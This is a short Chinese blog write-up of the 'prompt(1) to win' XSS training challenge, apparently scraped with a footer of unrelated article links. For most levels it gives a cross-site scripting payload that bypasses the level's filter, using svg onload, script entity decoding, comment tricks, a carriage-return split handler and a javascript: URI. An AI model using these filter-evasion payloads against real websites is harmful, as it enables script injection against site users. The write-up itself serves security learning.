prompt(1) to win writeup
来源:互联网 发布:android 彩票app源码 编辑:程序博客网 时间:2024/06/08 03:42
0
没有任何过滤
"><script>prompt(1)</script>
或者 "><svg/onload=prompt(1)>
1
过滤了大于号>,采用注释符//绕过
aa<svg/onload=prompt(1)//
2
过滤了左括号(,使用<svg>
标签绕过。在SVG向量里面的<script>
元素(或者其他CDATA元素 ),会先进行xml解析。因此(
(十六进制)或者(
(十进制)或者(
(html实体编码)会被还原成(。
<svg><script>prompt(1)</script>
或者 <svg><script>prompt(1)<b>
或者
<script>eval.call`${'prompt\x281)'}`</script>
或者
<script>eval.call`${'prompt\x281)'}`</script>
3
过滤了-->
,可用--!>
代替
a--!><script>prompt(1)</script>
或者 --!><svg/onload=prompt(1)
4
5
过滤了onxxx,过滤了>,通过回车符号绕过onxxx过滤
aa" type=image src=x onerror
="prompt(1)
6
仔细看源码
javascript:prompt(1)#{"action":1}
7
使用“和=构造payload
"><svg/a=#"onload='/*#*/prompt(1)'
0 0
- prompt(1) to win writeup
- prompt(1) to win writeup
- prompt(1) to win -----XSS学习笔记
- xss练习-prompt(1) to win
- Born to Win (1)
- failed to execute prompt script (exit code 1)
- 【20171025早】alert(1) to win 练习
- wechall writeup:Programming 1
- prompt
- Prompt
- prompt()
- prompt
- prompt
- How to change your shell prompt.
- How to Customize your Terminal Prompt
- how to output quotes in bash prompt
- Born to Win
- CTF考核writeup(1)
- Electron 调用本地模块
- js 排序算法--冒泡算法
- 安卓多媒体应用-通知
- about unity3d freeze packaging assets sharedassets0.assets
- archlinux安装个简单桌面icewm
- prompt(1) to win writeup
- RecyclerView添加头部(addHeaderView)和脚部(addFooterView)的封装
- JAVA多线程之——Semaphore
- 因为 MyEclipse 和jdk不匹配问题
- 历届试题 回文数字
- 练习
- Java中的构造方法
- python基础知识之逗号输出、赋值
- python写map,reduce访问集群文件